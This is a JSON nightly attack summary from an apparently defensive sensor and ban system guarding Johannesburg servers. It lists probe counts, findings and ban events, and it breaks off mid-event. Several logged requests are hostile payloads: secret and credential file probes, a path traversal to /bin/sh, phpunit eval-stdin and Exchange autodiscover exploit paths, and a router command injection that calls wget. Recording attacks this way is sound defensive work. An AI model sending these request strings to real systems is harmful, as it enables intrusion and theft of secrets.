{
 "night": "2026-10-06",
 "window": {
  "start": "2026-10-05T18:00:00+02:00",
  "end": "2026-10-06T06:00:00+02:00"
 },
 "target": {
  "label": "Johannesburg, ZA",
  "lat": -26.2041,
  "lon": 28.0473
 },
 "generated_at": "2026-10-07T11:35:12Z",
 "totals": {
  "attacks": 3930,
  "edge_attacks": 2771,
  "edge_new_bans": 31,
  "new_bans": 122,
  "requests": 38920,
  "blocked_at_edge": 1184,
  "active_bans": 56,
  "sensors": 4
 },
 "sensors": [
  {
   "id": "edge",
   "kind": "edge",
   "attacks": 2771,
   "new_bans": 31,
   "attacks_24h": 7349,
   "active_bans": 29,
   "categories": {
    "cms-probe": 2149,
    "secret-probe": 593,
    "protocol": 22,
    "scanner": 5,
    "behaviour": 1
   }
  },
  {
   "id": "web-1",
   "kind": "web",
   "attacks": 174,
   "new_bans": 6,
   "attacks_24h": 827,
   "active_bans": 1,
   "categories": {
    "secret-probe": 158,
    "cms-probe": 8,
    "scanner": 4,
    "code-injection": 3,
    "protocol": 1
   }
  },
  {
   "id": "web-2",
   "kind": "web",
   "attacks": 119,
   "new_bans": 9,
   "attacks_24h": 302,
   "active_bans": 3,
   "categories": {
    "secret-probe": 49,
    "cms-probe": 40,
    "protocol": 14,
    "scanner": 12,
    "code-injection": 4
   }
  },
  {
   "id": "web-3",
   "kind": "web",
   "attacks": 866,
   "new_bans": 76,
   "attacks_24h": 1981,
   "active_bans": 23,
   "categories": {
    "secret-probe": 270,
    "protocol": 203,
    "cms-probe": 167,
    "code-injection": 141,
    "scanner": 83
   }
  }
 ],
 "categories": {
  "cms-probe": 2364,
  "secret-probe": 1070,
  "protocol": 240,
  "code-injection": 148,
  "scanner": 104,
  "behaviour": 1
 },
 "findings": [
  {
   "severity": "critical",
   "rule": "Secret or VCS file probe",
   "rule_id": "BW-SEC-01",
   "type": "secret-probe",
   "requests": 549,
   "addresses": 32,
   "sensor": "edge",
   "first": "2026-10-05T18:02:00+02:00",
   "method": "GET",
   "path": "/admin/.env",
   "ip": "45.138.12.28"
  },
  {
   "severity": "critical",
   "rule": "Credential, state or dump file probe",
   "rule_id": "BW-SEC-02",
   "type": "credential-probe",
   "requests": 44,
   "addresses": 11,
   "sensor": "edge",
   "first": "2026-10-05T18:02:00+02:00",
   "method": "GET",
   "path": "/credentials.json",
   "ip": "45.138.12.28"
  },
  {
   "severity": "critical",
   "rule": "PHP or shell payload",
   "rule_id": "BW-RCE-03",
   "type": "rce-payload",
   "requests": 1,
   "addresses": 1,
   "sensor": "edge",
   "first": "2026-10-05T22:06:00+02:00",
   "method": "GET",
   "path": "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
   "ip": "91.92.41.115"
  },
  {
   "severity": "high",
   "rule": "Attack tool user agent",
   "rule_id": "BW-UA-01",
   "type": "attack-tool",
   "requests": 5,
   "addresses": 4,
   "sensor": "edge",
   "first": "2026-10-05T18:12:00+02:00",
   "method": "GET",
   "path": "/",
   "ip": "187.108.1.142"
  },
  {
   "severity": "high",
   "rule": "Run of missing-page requests",
   "rule_id": "BW-BEH-01",
   "type": "behaviour",
   "requests": 1,
   "addresses": 1,
   "sensor": "edge",
   "first": "2026-10-05T18:02:00+02:00",
   "method": "GET",
   "path": "/config.env",
   "ip": "45.138.12.28"
  },
  {
   "severity": "critical",
   "rule": "Secret or VCS file probe",
   "rule_id": "BW-SEC-01",
   "type": "secret-probe",
   "requests": 148,
   "addresses": 5,
   "sensor": "web-1",
   "first": "2026-10-05T18:11:00+02:00",
   "method": "GET",
   "path": "/.env",
   "ip": "45.148.10.171"
  },
  {
   "severity": "critical",
   "rule": "Credential, state or dump file probe",
   "rule_id": "BW-SEC-02",
   "type": "credential-probe",
   "requests": 10,
   "addresses": 2,
   "sensor": "web-1",
   "first": "2026-10-05T19:59:00+02:00",
   "method": "GET",
   "path": "/database.sql",
   "ip": "45.138.12.27"
  },
  {
   "severity": "critical",
   "rule": "PHP or shell payload",
   "rule_id": "BW-RCE-03",
   "type": "rce-payload",
   "requests": 3,
   "addresses": 2,
   "sensor": "web-1",
   "first": "2026-10-05T22:25:00+02:00",
   "method": "GET",
   "path": "/autodiscover/autodiscover.json?[[[@]]]zdi/Powershell",
   "ip": "20.84.75.121"
  },
  {
   "severity": "high",
   "rule": "Attack tool user agent",
   "rule_id": "BW-UA-01",
   "type": "attack-tool",
   "requests": 4,
   "addresses": 4,
   "sensor": "web-1",
   "first": "2026-10-05T21:29:00+02:00",
   "method": "GET",
   "path": "/actuator/health",
   "ip": "20.65.201.226"
  },
  {
   "severity": "medium",
   "rule": "PHP script probe",
   "rule_id": "BW-PHP-01",
   "type": "php-probe",
   "requests": 8,
   "addresses": 2,
   "sensor": "web-1",
   "first": "2026-10-05T19:59:00+02:00",
   "method": "GET",
   "path": "/api/phpinfo.php",
   "ip": "45.138.12.27"
  },
  {
   "severity": "critical",
   "rule": "Secret or VCS file probe",
   "rule_id": "BW-SEC-01",
   "type": "secret-probe",
   "requests": 26,
   "addresses": 5,
   "sensor": "web-2",
   "first": "2026-10-05T18:11:00+02:00",
   "method": "GET",
   "path": "/.env",
   "ip": "45.148.10.171"
  },
  {
   "severity": "critical",
   "rule": "Credential, state or dump file probe",
   "rule_id": "BW-SEC-02",
   "type": "credential-probe",
   "requests": 23,
   "addresses": 2,
   "sensor": "web-2",
   "first": "2026-10-05T19:04:00+02:00",
   "method": "GET",
   "path": "/wp-config.php.save",
   "ip": "54.94.85.181"
  },
  {
   "severity": "critical",
   "rule": "PHP or shell payload",
   "rule_id": "BW-RCE-03",
   "type": "rce-payload",
   "requests": 4,
   "addresses": 3,
   "sensor": "web-2",
   "first": "2026-10-05T19:52:00+02:00",
   "method": "POST",
   "path": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh",
   "ip": "120.48.171.196"
  },
  {
   "severity": "high",
   "rule": "Attack tool user agent",
   "rule_id": "BW-UA-01",
   "type": "attack-tool",
   "requests": 12,
   "addresses": 9,
   "sensor": "web-2",
   "first": "2026-10-05T18:14:00+02:00",
   "method": "GET",
   "path": "/",
   "ip": "187.108.1.142"
  },
  {
   "severity": "medium",
   "rule": "CMS, admin or appliance probe",
   "rule_id": "BW-CMS-01",
   "type": "cms-probe",
   "requests": 38,
   "addresses": 5,
   "sensor": "web-2",
   "first": "2026-10-05T19:04:00+02:00",
   "method": "GET",
   "path": "/Jenkinsfile",
   "ip": "54.94.85.181"
  },
  {
   "severity": "critical",
   "rule": "Secret or VCS file probe",
   "rule_id": "BW-SEC-01",
   "type": "secret-probe",
   "requests": 261,
   "addresses": 34,
   "sensor": "web-3",
   "first": "2026-10-05T18:10:00+02:00",
   "method": "GET",
   "path": "/.env",
   "ip": "45.148.10.171"
  },
  {
   "severity": "critical",
   "rule": "PHP or shell payload",
   "rule_id": "BW-RCE-03",
   "type": "rce-payload",
   "requests": 138,
   "addresses": 27,
   "sensor": "web-3",
   "first": "2026-10-05T18:06:00+02:00",
   "method": "POST",
   "path": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh",
   "ip": "87.126.145.190"
  },
  {
   "severity": "critical",
   "rule": "Credential, state or dump file probe",
   "rule_id": "BW-SEC-02",
   "type": "credential-probe",
   "requests": 9,
   "addresses": 4,
   "sensor": "web-3",
   "first": "2026-10-05T21:29:00+02:00",
   "method": "GET",
   "path": "/wp-config.php",
   "ip": "87.121.84.174"
  },
  {
   "severity": "critical",
   "rule": "Shell command injection",
   "rule_id": "BW-RCE-02",
   "type": "command-injection",
   "requests": 3,
   "addresses": 2,
   "sensor": "web-3",
   "first": "2026-10-06T02:18:00+02:00",
   "method": "GET",
   "path": "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0\u2026",
   "ip": "221.159.119.6"
  },
  {
   "severity": "high",
   "rule": "Attack tool user agent",
   "rule_id": "BW-UA-01",
   "type": "attack-tool",
   "requests": 83,
   "addresses": 51,
   "sensor": "web-3",
   "first": "2026-10-05T18:01:00+02:00",
   "method": "GET",
   "path": "/",
   "ip": "187.108.1.142"
  }
 ],
 "events": [
  {
   "t": "2026-10-05T18:01:00+02:00",
   "ip": "187.108.1.142",
   "type": "attack-tool",
   "kind": "finding",
   "severity": "high",
   "path": "/",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T18:02:00+02:00",
   "ip": "45.138.12.28",
   "type": "secret-probe",
   "kind": "finding",
   "severity": "critical",
   "path": "/admin/.env",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T18:02:00+02:00",
   "ip": "45.138.12.28",
   "type": "credential-probe",
   "kind": "finding",
   "severity": "critical",
   "path": "/credentials.json",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T18:02:00+02:00",
   "ip": "45.138.12.28",
   "type": "behaviour",
   "kind": "finding",
   "severity": "high",
   "path": "/config.env",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T18:05:00+02:00",
   "ip": "187.108.1.142",
   "type": "attack-tool",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T18:06:00+02:00",
   "ip": "87.126.145.190",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T18:06:00+02:00",
   "ip": "87.126.145.190",
   "type": "rce-payload",
   "kind": "finding",
   "severity": "critical",
   "path": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T18:09:00+02:00",
   "ip": "35.217.150.248",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T18:10:00+02:00",
   "ip": "45.148.10.171",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T18:10:00+02:00",
   "ip": "45.148.10.171",
   "type": "secret-probe",
   "kind": "finding",
   "severity": "critical",
   "path": "/.env",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T18:11:00+02:00",
   "ip": "45.148.10.171",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-05T18:11:00+02:00",
   "ip": "45.148.10.171",
   "type": "secret-probe",
   "kind": "finding",
   "severity": "critical",
   "path": "/.env",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-05T18:11:00+02:00",
   "ip": "45.148.10.171",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-05T18:11:00+02:00",
   "ip": "45.148.10.171",
   "type": "secret-probe",
   "kind": "finding",
   "severity": "critical",
   "path": "/.env",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-05T18:12:00+02:00",
   "ip": "187.108.1.142",
   "type": "attack-tool",
   "kind": "finding",
   "severity": "high",
   "path": "/",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T18:14:00+02:00",
   "ip": "187.108.1.142",
   "type": "attack-tool",
   "kind": "finding",
   "severity": "high",
   "path": "/",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-05T18:20:00+02:00",
   "ip": "20.219.14.152",
   "type": "php-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T18:33:00+02:00",
   "ip": "84.247.157.60",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T18:51:00+02:00",
   "ip": "136.107.20.139",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T18:53:00+02:00",
   "ip": "34.79.12.228",
   "type": "credential-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T19:04:00+02:00",
   "ip": "54.94.85.181",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-05T19:04:00+02:00",
   "ip": "54.94.85.181",
   "type": "credential-probe",
   "kind": "finding",
   "severity": "critical",
   "path": "/wp-config.php.save",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-05T19:04:00+02:00",
   "ip": "54.94.85.181",
   "type": "cms-probe",
   "kind": "finding",
   "severity": "medium",
   "path": "/Jenkinsfile",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-05T19:26:00+02:00",
   "ip": "35.215.59.170",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T19:30:00+02:00",
   "ip": "94.143.143.250",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T19:32:00+02:00",
   "ip": "68.69.177.112",
   "type": "php-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T19:33:00+02:00",
   "ip": "193.32.204.199",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T19:43:00+02:00",
   "ip": "34.237.176.214",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T19:47:00+02:00",
   "ip": "34.156.206.32",
   "type": "credential-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T19:50:00+02:00",
   "ip": "34.237.176.214",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T19:50:00+02:00",
   "ip": "82.102.18.116",
   "type": "cms-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T19:52:00+02:00",
   "ip": "34.237.176.214",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-05T19:52:00+02:00",
   "ip": "120.48.171.196",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-05T19:52:00+02:00",
   "ip": "120.48.171.196",
   "type": "rce-payload",
   "kind": "finding",
   "severity": "critical",
   "path": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-05T19:53:00+02:00",
   "ip": "35.189.229.134",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T19:53:00+02:00",
   "ip": "103.216.170.129",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T19:59:00+02:00",
   "ip": "45.138.12.27",
   "type": "credential-probe",
   "kind": "finding",
   "severity": "critical",
   "path": "/database.sql",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-05T19:59:00+02:00",
   "ip": "45.138.12.27",
   "type": "php-probe",
   "kind": "finding",
   "severity": "medium",
   "path": "/api/phpinfo.php",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-05T20:00:00+02:00",
   "ip": "23.180.120.153",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T20:03:00+02:00",
   "ip": "206.81.24.227",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T20:07:00+02:00",
   "ip": "66.240.223.214",
   "type": "attack-tool",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T20:11:00+02:00",
   "ip": "40.86.204.64",
   "type": "cms-probe",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T20:15:00+02:00",
   "ip": "45.43.60.98",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T20:26:00+02:00",
   "ip": "45.138.12.27",
   "type": "credential-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T20:31:00+02:00",
   "ip": "186.182.105.49",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-05T20:36:00+02:00",
   "ip": "139.59.136.184",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T20:36:00+02:00",
   "ip": "209.38.248.17",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T20:36:00+02:00",
   "ip": "128.199.182.55",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T20:36:00+02:00",
   "ip": "164.92.107.174",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T20:41:00+02:00",
   "ip": "159.89.12.166",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T20:41:00+02:00",
   "ip": "159.223.132.86",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T20:41:00+02:00",
   "ip": "167.99.181.249",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T20:44:00+02:00",
   "ip": "64.225.75.246",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T20:44:00+02:00",
   "ip": "206.81.12.187",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T20:52:00+02:00",
   "ip": "34.237.176.214",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T21:09:00+02:00",
   "ip": "193.32.126.155",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T21:25:00+02:00",
   "ip": "35.240.194.248",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T21:25:00+02:00",
   "ip": "102.220.163.155",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T21:27:00+02:00",
   "ip": "45.195.231.146",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T21:29:00+02:00",
   "ip": "20.65.201.226",
   "type": "attack-tool",
   "kind": "finding",
   "severity": "high",
   "path": "/actuator/health",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-05T21:29:00+02:00",
   "ip": "87.121.84.174",
   "type": "credential-probe",
   "kind": "finding",
   "severity": "critical",
   "path": "/wp-config.php",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T21:30:00+02:00",
   "ip": "104.234.186.154",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T21:38:00+02:00",
   "ip": "193.32.126.155",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T22:01:00+02:00",
   "ip": "45.141.26.3",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T22:06:00+02:00",
   "ip": "91.92.41.115",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T22:06:00+02:00",
   "ip": "91.92.41.115",
   "type": "rce-payload",
   "kind": "finding",
   "severity": "critical",
   "path": "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T22:23:00+02:00",
   "ip": "52.165.83.218",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T22:23:00+02:00",
   "ip": "20.163.10.217",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T22:23:00+02:00",
   "ip": "20.80.111.73",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T22:23:00+02:00",
   "ip": "20.65.145.206",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T22:23:00+02:00",
   "ip": "40.124.168.91",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T22:24:00+02:00",
   "ip": "4.148.17.77",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T22:25:00+02:00",
   "ip": "20.84.75.121",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-05T22:25:00+02:00",
   "ip": "20.84.75.121",
   "type": "rce-payload",
   "kind": "finding",
   "severity": "critical",
   "path": "/autodiscover/autodiscover.json?[[[@]]]zdi/Powershell",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-05T22:25:00+02:00",
   "ip": "13.89.126.19",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T22:25:00+02:00",
   "ip": "20.64.98.9",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T22:25:00+02:00",
   "ip": "20.65.178.72",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T22:27:00+02:00",
   "ip": "40.124.172.22",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T22:28:00+02:00",
   "ip": "40.124.186.173",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T22:30:00+02:00",
   "ip": "20.194.30.107",
   "type": "php-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T22:38:00+02:00",
   "ip": "142.93.129.190",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T22:38:00+02:00",
   "ip": "64.226.65.160",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T22:38:00+02:00",
   "ip": "157.245.204.205",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T22:39:00+02:00",
   "ip": "138.68.86.32",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T22:49:00+02:00",
   "ip": "66.240.223.214",
   "type": "attack-tool",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T22:58:00+02:00",
   "ip": "104.244.74.39",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 4,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T23:12:00+02:00",
   "ip": "212.231.226.20",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T23:20:00+02:00",
   "ip": "34.81.90.137",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T23:31:00+02:00",
   "ip": "103.46.186.148",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T23:35:00+02:00",
   "ip": "34.237.176.214",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-05T23:43:00+02:00",
   "ip": "129.213.151.234",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T23:59:00+02:00",
   "ip": "111.90.180.172",
   "type": "credential-probe",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T00:06:00+02:00",
   "ip": "66.240.223.240",
   "type": "attack-tool",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T00:10:00+02:00",
   "ip": "73.53.43.220",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-06T00:19:00+02:00",
   "ip": "176.65.149.188",
   "type": "attack-tool",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T00:20:00+02:00",
   "ip": "80.94.92.65",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-06T00:20:00+02:00",
   "ip": "80.94.92.65",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T00:21:00+02:00",
   "ip": "80.94.92.65",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-06T00:32:00+02:00",
   "ip": "193.32.162.157",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T00:34:00+02:00",
   "ip": "82.102.18.180",
   "type": "cms-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-06T00:49:00+02:00",
   "ip": "176.65.148.150",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T00:59:00+02:00",
   "ip": "89.126.211.166",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T01:05:00+02:00",
   "ip": "20.194.96.114",
   "type": "php-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T01:12:00+02:00",
   "ip": "45.148.10.120",
   "type": "credential-probe",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T01:22:00+02:00",
   "ip": "45.148.10.120",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-06T01:23:00+02:00",
   "ip": "34.85.106.58",
   "type": "credential-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-06T01:27:00+02:00",
   "ip": "45.138.12.6",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T01:35:00+02:00",
   "ip": "165.227.84.14",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T01:57:00+02:00",
   "ip": "91.92.240.86",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 4,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-06T02:18:00+02:00",
   "ip": "221.159.119.6",
   "type": "command-injection",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-06T02:18:00+02:00",
   "ip": "221.159.119.6",
   "type": "command-injection",
   "kind": "finding",
   "severity": "critical",
